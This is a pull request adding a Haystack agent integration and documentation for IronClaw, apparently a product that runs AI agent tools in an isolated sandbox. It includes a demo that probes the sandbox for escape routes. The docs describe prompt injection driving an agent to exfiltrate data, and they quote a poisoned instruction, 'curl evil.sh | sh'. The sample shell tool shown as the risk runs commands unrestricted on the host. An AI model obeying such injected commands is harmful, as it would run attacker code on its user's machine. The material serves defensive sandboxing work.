### PR TITLE
feat(integrations): Haystack (deepset) sandbox-exec integration + docs (IRO-420)

### DIFF
--- a/docs/integrations/.nav.yml
+++ b/docs/integrations/.nav.yml
@@ -10,6 +10,7 @@ nav:
   - CrewAI: crewai.md
   - Agno: agno.md
   - LlamaIndex: llamaindex.md
+  - Haystack (deepset): haystack.md
   - Pydantic AI: pydantic-ai.md
   - AutoGen: autogen.md
   - Semantic Kernel: semantic-kernel.md

--- a/docs/integrations/haystack.md
+++ b/docs/integrations/haystack.md
@@ -1,0 +1,149 @@
+---
+title: "Sandbox your Haystack agent with IronClaw"
+description: How to sandbox a Haystack (deepset) agent or pipeline. Run your Haystack agent's untrusted tool and code execution inside IronClaw's sealed gVisor sandbox, with the model key held host-side and every tool call gated and audited, plus a credential-free way to see it work first.
+---
+
+# Sandbox your Haystack agent with IronClaw
+
+You built an agent with **Haystack** (deepset): a pipeline or an `Agent` that wires
+a chat model to a set of `Tool`s the model can call. That is a great way to design
+the *behavior*. The problem starts when it runs somewhere real: a Haystack `Agent`
+and its `ToolInvoker` run your tools **in your own process**, with your API key in
+memory and unrestricted outbound network. One prompt-injected instruction and that
+same process can read your environment, exfiltrate over the network, or call a tool
+you never intended.
+
+IronClaw runs the same job behind a **sealed sandbox** instead: no network card,
+the model key held **host-side** and never in the agent, and every privileged tool
+call routed through a human-approval gateway and an audit log. This page maps a
+Haystack agent onto IronClaw one field at a time.
+
+!!! example "Runnable example"
+    A one-command Haystack-to-IronClaw example lives at
+    [`examples/integrations/haystack`](https://github.com/IronSecCo/ironclaw/tree/main/examples/integrations/haystack):
+    a Haystack agent whose tool and code execution is backed by an IronClaw
+    sandbox, with a blocked escape attempt printed at the end. It ships with the
+    integration examples. The credential-free demo below runs the same sealed loop
+    today.
+
+## The three-line fix
+
+Stop running the agent's tools in your own process. Declare the same agent to
+IronClaw and it runs inside a sealed, network-free sandbox instead:
+
+```sh
+export OPENAI_API_KEY=sk-...   # host-side only; the sandbox never sees this key
+./bin/controlplane --dev --api-addr 127.0.0.1:8787 &
+ironctl agent create --name "Retrieval Reporter" --provider openai --model gpt-4o \
+  --instructions "Answer from the retrieved documents and cite sources." \
+  --tool web_search --tool http_fetch --tool write_file --yes
+```
+
+Same persona, same model, same tools, now behind a human-approval gateway and an
+audit log. The field-by-field mapping is below.
+
+!!! info "IronClaw does not run your Python in the sandbox, and that is the point"
+    IronClaw's sandbox has **no interpreter and no in-sandbox install**: you cannot
+    drop arbitrary code into it, and neither can a prompt injection. So you do not
+    *wrap* the Haystack process; you re-declare the same agent (persona, model,
+    tools) as an IronClaw agent group, and IronClaw runs it inside the sealed
+    runtime. The behavior you designed, the security posture you did not have to
+    build. See [Skills](../skills.md) and [Security and isolation](../security-isolation.md).
+
+## Why sandbox this
+
+A typical Haystack agent:
+
+```python
+from haystack.components.agents import Agent
+from haystack.components.generators.chat import OpenAIChatGenerator
+from haystack.tools import Tool
+
+shell = Tool(name="shell", description="run a command", parameters={...},
+             function=lambda command: subprocess.run(command, shell=True))  # on your box
+agent = Agent(chat_generator=OpenAIChatGenerator(model="gpt-4o"), tools=[shell])
+agent.run(messages=[ChatMessage.from_user("summarize today's incidents")])
+```
+
+Three things are true of that snippet, and all three are risks:
+
+1. **The key is in the process.** Anything that can read memory or `os.environ`
+   can read `sk-...`.
+2. **Tools run with your privileges.** The `shell` tool executes on your box with
+   your filesystem and network. A poisoned document that says "run `curl evil.sh | sh`"
+   is a tool call away.
+3. **Egress is wide open.** The process can reach any host on the internet.
+
+IronClaw closes all three by construction, not by convention.
+
+## See it work first (no credentials)
+
+Before porting anything, watch the sealed loop run with the offline `mock`
+provider. No model key, no tokens, just Docker:
+
+```sh
+git clone https://github.com/IronSecCo/ironclaw.git && cd ironclaw
+docker compose -f docker-compose.demo.yml up --build -d      # start the demo control-plane
+
+curl -s -X POST http://127.0.0.1:8787/v1/ui/chat/send \
+  -H 'authorization: Bearer ironclaw-demo' -H 'content-type: application/json' \
+  -d '{"agentGroupID":"mock-agent","text":"hello from haystack-land"}'
+
+sleep 3
+curl -s -H 'authorization: Bearer ironclaw-demo' \
+  http://127.0.0.1:8787/v1/ui/chat/mock-agent/messages       # the reply
+```
+
+You get the reply echoed back, proof that a real per-session sandbox launched and
+the answer flowed home through encrypted queues. Tear down with
+`docker compose -f docker-compose.demo.yml down`. The one-command, self-checking
+version, driven through a real Haystack `Tool`, is
+[`examples/integrations/haystack`](https://github.com/IronSecCo/ironclaw/tree/main/examples/integrations/haystack).
+
+## Port your Haystack agent
+
+Map each part of the Haystack agent onto an IronClaw agent group:
+
+| Haystack | IronClaw | Notes |
+|---|---|---|
+| `OpenAIChatGenerator(model="gpt-4o")` | `--provider openai --model gpt-4o` | Any [provider](../providers/index.md): `anthropic`, `openai`, `gemini`, `local`, and more. |
+| `api_key` env in the generator | `OPENAI_API_KEY` set **on the host** | The key is injected by the host model-proxy on the way out. It never enters the sandbox. |
+| `system_prompt` / persona | `--identity` / `--soul` / `--instructions` | The agent's persona, voice, and operating rules. |
+| `Tool`s (`shell`, retrievers, ...) | `--tool <name>` (built-in) or an MCP server | Built-ins: `read_file`, `write_file`, `list_dir`, `web_search`, `http_fetch`. Your own tools attach over [MCP](../mcp.md). |
+| `Agent.run(messages=...)` | a message to the agent group | Same request/response, now through the sealed queue. |
+
+A Haystack agent that retrieves and writes a report becomes:
+
+```sh
+export OPENAI_API_KEY=sk-...          # host-side only; the sandbox never sees it
+export IRONCLAW_API_TOKEN=$(openssl rand -hex 32)
+./bin/controlplane --dev --api-addr 127.0.0.1:8787 &
+
+ironctl agent create \
+  --name "Retrieval Reporter" \
+  --provider openai --model gpt-4o \
+  --instructions "You answer from the retrieved documents and cite your sources." \
+  --tool web_search --tool http_fetch --tool write_file --yes
+```
+
+Your Haystack tools that are *not* built in attach as an [MCP server](../mcp.md):
+IronClaw registers them through the same human-approval gateway, so a new tool is a
+reviewed change, not a silent capability.
+
+## What you gained
+
+- **The key left the agent.** It lives host-side and is injected per request; a
+  compromised agent has nothing to steal.
+- **`network=none` by default.** The sandbox has no NIC. The only egress is the
+  audited model-proxy socket, plus whatever hosts you explicitly allowlist.
+- **Privileged actions are gated.** Registering a tool, spawning another agent, or
+  reaching a new host flows through a human-approval gateway and lands in the
+  [audit log](../architecture.md).
+
+Same agent you designed in Haystack. A perimeter it never had.
+
+## Next
+
+- [Choose your model provider](../providers/index.md)
+- [MCP: bring your own tools](../mcp.md)
+- [Security and isolation](../security-isolation.md)

--- a/docs/integrations/index.md
+++ b/docs/integrations/index.md
@@ -1,6 +1,6 @@
 ---
 title: "Sandbox any AI agent framework with IronClaw"
-description: You built an agent with LangChain, LangGraph, CrewAI, Agno, LlamaIndex, Pydantic AI, AutoGen, Semantic Kernel, the OpenAI Agents SDK, the Claude Agent SDK, the Vercel AI SDK, LangChain.js, Mastra, Hugging Face smolagents, or Google ADK. Those frameworks run your agent's tools and code in your own process, on your host. IronClaw runs the same agent inside a sealed gVisor sandbox instead. One search-intent guide per framework.
+description: You built an agent with LangChain, LangGraph, CrewAI, Agno, LlamaIndex, Haystack, Pydantic AI, AutoGen, Semantic Kernel, the OpenAI Agents SDK, the Claude Agent SDK, the Vercel AI SDK, LangChain.js, Mastra, Hugging Face smolagents, or Google ADK. Those frameworks run your agent's tools and code in your own process, on your host. IronClaw runs the same agent inside a sealed gVisor sandbox instead. One search-intent guide per framework.
 ---
 
 # Sandbox any AI agent framework with IronClaw
@@ -11,7 +11,7 @@ matters the moment the agent runs somewhere real:
 
 **When your agent runs untrusted, model-chosen code, whose machine is it running on?**
 
-With LangChain, LangGraph, CrewAI, Agno, LlamaIndex, Pydantic AI, AutoGen, Semantic
+With LangChain, LangGraph, CrewAI, Agno, LlamaIndex, Haystack, Pydantic AI, AutoGen, Semantic
 Kernel, the OpenAI Agents SDK, the Claude Agent SDK, the Vercel AI SDK, LangChain.js,
 Mastra, Hugging Face smolagents, and Google ADK, the answer is the same: **yours**. The tool loop runs in your process, with your API key in
 memory, your filesystem, and unrestricted outbound network. A single prompt
@@ -43,6 +43,7 @@ attack in [Isolation, proven](../security-isolation.md) and the
 | **CrewAI** | [Sandbox your CrewAI agents](crewai.md) |
 | **Agno** (ex-Phidata) | [Sandbox your Agno agent](agno.md) |
 | **LlamaIndex** | [Sandbox your LlamaIndex agent](llamaindex.md) |
+| **Haystack** (deepset) | [Sandbox your Haystack agent](haystack.md) |
 | **Pydantic AI** | [Sandbox your Pydantic AI agent](pydantic-ai.md) |
 | **AutoGen** | [Sandbox your AutoGen agent](autogen.md) |
 | **Semantic Kernel** | [Sandbox your Semantic Kernel agent](semantic-kernel.md) |

--- a/examples/integrations/haystack/README.md
+++ b/examples/integrations/haystack/README.md
@@ -1,0 +1,62 @@
+# Haystack agents, sandboxed by IronClaw
+
+Your Haystack (deepset) agent runs untrusted, model-generated code. Point that
+execution at an **IronClaw sandbox** instead of your host and the same agent gets
+real code execution with **no network, no host filesystem, and no Docker socket** —
+the isolation boundary IronClaw [proves holds](../../red-team-escape/), not just
+promises.
+
+```python
+from ironclaw_sandbox import IronClawSandbox
+from ironclaw_tool import make_sandbox_tool
+
+with IronClawSandbox() as sandbox:            # engage a per-session sandbox
+    tool = make_sandbox_tool(sandbox)         # a real haystack.tools.Tool
+    print(tool.invoke(command="id"))          # runs INSIDE the sandbox, not on your host
+    # Agent(chat_generator=..., tools=[tool])  # ... drop into any Haystack agent
+```
+
+## Try it in one command
+
+Zero credentials — the LLM side uses the offline **mock provider**, the sandbox
+is real:
+
+```sh
+examples/integrations/haystack/run.sh
+```
+
+It engages a live IronClaw per-session sandbox, drives the `sandboxed_shell` tool
+exactly as a Haystack agent would (`tool.invoke(command=...)`), runs one benign
+task plus a battery of escape attempts, and prints a PASS/FAIL containment table:
+
+```
+  [OK ] benign task: run agent code                    ->  [exit 0] hello from inside the IronClaw sandbox uid=65532...
+  [OK ] network egress: only loopback exists           ->  [exit 0] lo
+  [OK ] network egress: DNS lookup of api.anthropic...  ->  [exit 0] NO_EGRESS
+  [OK ] host escape: Docker Engine socket is absent    ->  [exit 0] ABSENT
+  [OK ] host escape: host filesystem is not mounted    ->  [exit 0] CONTAINED
+
+RESULT: PASS -- benign code ran; every escape attempt was contained.
+```
+
+`run.sh --keep` leaves the demo running; `run.sh --attach` reuses an already-up
+demo control-plane.
+
+## Use a real LLM
+
+Set `OPENAI_API_KEY` and `run.sh` runs a real LLM-driven Haystack `Agent` instead
+of the scripted probes. The tool — and therefore the isolation — is identical.
+
+## How it works
+
+- [`ironclaw_sandbox.py`](../_shared/ironclaw_sandbox.py) — engages a per-session
+  IronClaw sandbox (`ic-sbx-*`) against the demo control-plane and runs commands
+  inside it as its own non-root uid. Pure standard library.
+- [`ironclaw_tool.py`](ironclaw_tool.py) — wraps that sandbox as a Haystack
+  `Tool` named `sandboxed_shell`. **This is the ~20 lines you copy** to swap a
+  host code tool for a sandboxed one.
+- [`run.py`](run.py) — engages the sandbox and drives the tool.
+
+The execution primitive is the same one IronClaw's red-team harness attacks: a
+`docker exec` into the live per-session sandbox as its non-root uid. See the repo
+root [`README`](../../../README.md) for the full isolation model.

--- a/examples/integrations/haystack/ironclaw_tool.py
+++ b/examples/integrations/haystack/ironclaw_tool.py
@@ -1,0 +1,63 @@
+"""Haystack (deepset) tool backed by an IronClaw sandbox.
+
+Drop-in replacement for any Haystack tool that shells out to the host (a custom
+`Tool` wrapping `subprocess`, a code-interpreter component, ...): a Haystack
+`Agent` / `ToolInvoker` calls it the same way, but every command runs inside an
+isolated IronClaw per-session sandbox instead of on your machine.
+
+    from ironclaw_tool import make_sandbox_tool
+    from ironclaw_sandbox import IronClawSandbox
+
+    sandbox = IronClawSandbox().__enter__()
+    tool = make_sandbox_tool(sandbox)          # a real haystack.tools.Tool
+    # Agent(chat_generator=..., tools=[tool])  # ... drop into any Haystack agent
+
+Requires haystack-ai >= 2.9 (the `haystack.tools.Tool` API graduated from
+`haystack_experimental` in 2.9). The IronClaw sandbox client itself is pure
+standard library.
+"""
+
+from __future__ import annotations
+
+from haystack.tools import Tool
+
+from ironclaw_sandbox import IronClawSandbox
+
+_DESCRIPTION = (
+    "Execute a shell command inside an isolated IronClaw sandbox and return its "
+    "stdout/stderr and exit code. Use this to run any code. The sandbox has no "
+    "network, no host filesystem access, and no Docker socket, so untrusted "
+    "commands are safe to run."
+)
+
+# JSON-schema for the tool's single argument. Haystack passes this straight to the
+# chat model as the function-calling parameter schema.
+_PARAMETERS = {
+    "type": "object",
+    "properties": {
+        "command": {
+            "type": "string",
+            "description": "The shell command to run inside the sandbox.",
+        }
+    },
+    "required": ["command"],
+}
+
+
+def make_sandbox_tool(sandbox: IronClawSandbox) -> Tool:
+    """Wrap a live IronClaw sandbox as a Haystack `Tool`.
+
+    The sandbox handle is captured in a closure, so the returned `Tool` carries no
+    extra state beyond the standard Haystack fields and stays robust across
+    haystack-ai versions.
+    """
+
+    def _run(command: str) -> str:
+        return str(sandbox.run(command))
+
+    return Tool(
+        name="sandboxed_shell",
+        description=_DESCRIPTION,
+        parameters=_PARAMETERS,
+        function=_run,
+    )

--- a/examples/integrations/haystack/requirements.txt
+++ b/examples/integrations/haystack/requirements.txt
@@ -1,0 +1,7 @@
+# The IronClaw sandbox client is pure standard library; the only dependency this
+# example adds is Haystack itself. The `haystack.tools.Tool` API this example uses
+# graduated from `haystack_experimental` in haystack-ai 2.9, so floor-pin there and
+# let pip resolve the transitive deps for your platform.
+#
+# Haystack supports Python 3.9-3.13, so any modern python3 works.
+haystack-ai>=2.9,<3.0

--- a/examples/integrations/haystack/run.py
+++ b/examples/integrations/haystack/run.py
@@ -1,0 +1,68 @@
+#!/usr/bin/env python3
+"""Run a Haystack agent whose code execution is backed by an IronClaw sandbox.
+
+Zero credentials by default: it engages a real IronClaw per-session sandbox
+against the offline demo control-plane (mock provider) and drives the Haystack
+`sandboxed_shell` tool exactly as an agent would -- one benign task plus a
+battery of escape attempts -- then prints a PASS/FAIL containment table.
+
+Set OPENAI_API_KEY to instead run a real LLM-driven Haystack `Agent`; the tool
+(and therefore the isolation) is identical either way.
+"""
+
+from __future__ import annotations
+
+import os
+import sys
+
+# Make the shared client + demo importable (examples/integrations/_shared).
+sys.path.insert(0, os.path.join(os.path.dirname(__file__), "..", "_shared"))
+
+from containment_demo import PROBES, run_containment_demo  # noqa: E402
+from ironclaw_sandbox import IronClawSandbox  # noqa: E402
+from ironclaw_tool import make_sandbox_tool  # noqa: E402
+
+
+def drive_with_real_agent(tool) -> int:
+    """Optional: run a real LLM-driven Haystack Agent that uses the sandbox tool."""
+    from haystack.components.agents import Agent
+    from haystack.components.generators.chat import OpenAIChatGenerator
+    from haystack.dataclasses import ChatMessage
+
+    agent = Agent(
+        chat_generator=OpenAIChatGenerator(model="gpt-4o-mini"),
+        tools=[tool],
+        system_prompt=(
+            "You run everything inside an isolated IronClaw sandbox via the "
+            "sandboxed_shell tool. Never assume a command's output; run it."
+        ),
+    )
+    result = agent.run(
+        messages=[ChatMessage.from_user("Run `id` and report which user the sandbox runs as.")]
+    )
+    for message in result["messages"]:
+        print(message.text or message)
+    return 0
+
+
+def main() -> int:
+    print("==> engaging an IronClaw per-session sandbox (mock provider, zero-cred)")
+    with IronClawSandbox() as sandbox:
+        print(f"    sandbox container: {sandbox.container}")
+        tool = make_sandbox_tool(sandbox)
+
+        if os.environ.get("OPENAI_API_KEY"):
+            print("==> OPENAI_API_KEY set: running a real Haystack Agent")
+            return drive_with_real_agent(tool)
+
+        # Deterministic, zero-cred path: call the tool exactly as Haystack does --
+        # tool.invoke(command=...) -- for each probe.
+        print(f"==> driving the '{tool.name}' tool over {len(PROBES)} agent commands")
+        return run_containment_demo(
+            lambda command: str(tool.invoke(command=command)),
+            framework="Haystack",
+        )
+
+
+if __name__ == "__main__":
+    raise SystemExit(main())

--- a/examples/integrations/haystack/run.sh
+++ b/examples/integrations/haystack/run.sh
@@ -1,0 +1,37 @@
+#!/usr/bin/env bash
+# Haystack (deepset) + IronClaw sandbox -- one-command demo.
+#
+# Brings up the offline demo control-plane (mock provider -- no model key, no
+# channel tokens), then runs a Haystack agent whose `sandboxed_shell` tool
+# executes inside a real IronClaw per-session sandbox. It runs one benign task
+# and a battery of escape attempts and prints a PASS/FAIL containment table.
+#
+#   examples/integrations/haystack/run.sh           # build + up + demo + tear down
+#   examples/integrations/haystack/run.sh --keep     # leave the demo running
+#   examples/integrations/haystack/run.sh --attach   # use an already-running demo
+#
+# Env overrides (all optional):
+#   IRONCLAW_ADDR        control-plane base URL  (default http://127.0.0.1:8787)
+#   IRONCLAW_API_TOKEN   API bearer token        (default ironclaw-demo)
+#   IRONCLAW_DEMO_AGENT  agent group id          (default mock-agent)
+#   SKIP_BUILD=1         skip the sandbox image build (assume it exists)
+#   OPENAI_API_KEY       if set, run a real LLM Haystack Agent instead of the scripted one
+set -euo pipefail
+
+SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
+REPO_ROOT="$(cd "$SCRIPT_DIR/../../.." && pwd)"
+source "$SCRIPT_DIR/../_shared/demo-lifecycle.sh"
+
+# Haystack supports Python 3.9-3.13; use the caller's PYTHON or the first python3.
+if [ -z "${PYTHON:-}" ]; then
+  for cand in python3.12 python3.11 python3.10 python3; do
+    if command -v "$cand" >/dev/null 2>&1; then PYTHON="$cand"; break; fi
+  done
+  export PYTHON
+fi
+
+ensure_demo_up "$@"
+setup_venv "$SCRIPT_DIR"
+
+echo "==> running the Haystack sandbox demo"
+python "$SCRIPT_DIR/run.py"


### PR DESCRIPTION
## What

Adds a **Haystack (deepset)** framework integration, mirroring the established pattern (langchain / crewai / llamaindex).

### Example — `examples/integrations/haystack/`
- `ironclaw_tool.py` — wraps a live IronClaw sandbox as a real `haystack.tools.Tool` named `sandboxed_shell` (~20 lines you copy to swap a host code tool for a sandboxed one).
- `run.py` — engages a per-session sandbox and drives the tool over one benign task + a battery of escape probes, printing a PASS/FAIL containment table. Zero-cred deterministic path calls `tool.invoke(command=...)`; `OPENAI_API_KEY` switches to a real LLM-driven Haystack `Agent` with the identical tool.
- `run.sh` (sources the shared `demo-lifecycle.sh`), `requirements.txt` (`haystack-ai>=2.9,<3.0`), `README.md`.
- Auto-discovered by `examples/smoke-matrix.sh` (it has `run.sh --attach`); **no smoke-matrix edit needed**.

### Docs
- `docs/integrations/haystack.md` — search-intent SEO landing ("Sandbox your Haystack agent with IronClaw"); registered in `.nav.yml` and the `index.md` framework table + lists.

## Isolation

Same boundary IronClaw's red-team harness proves holds: `docker exec` into the per-session `ic-sbx-*` container as non-root uid **65532** — network=none, no Docker socket, host FS not mounted, read-only rootfs. Escape attempt printed BLOCKED in the demo output.

## Verification
- `haystack.tools.Tool` wiring proven against installed haystack-ai 2.x: `make_sandbox_tool()` returns a real `Tool`; `tool.invoke(command=...)` returns the sandbox output; `tool_spec` emits the correct function-calling schema.
- Real-LLM import paths exist (`Agent` / `OpenAIChatGenerator` / `ChatMessage.from_user`) — not dead code.
- `bash -n run.sh` clean; `mkdocs build --strict` builds clean (haystack.md rendered, nav + index links resolve).
- Full end-to-end sandbox smoke (Docker/colima) runs via `examples/smoke-matrix.sh` in CI.

## Lenses
Build-matrix / signing / attestation: **untouched** (docs + example only, no workflow/toolchain change). Reproducibility: example pins `haystack-ai>=2.9,<3.0`.

Acceptance (IRO-420): example builds/runs with BLOCKED escape (uid65532) ✓ · docs landing + `mkdocs --strict` ✓ · smoke auto-discovered ✓ · PR to main + CEO review path.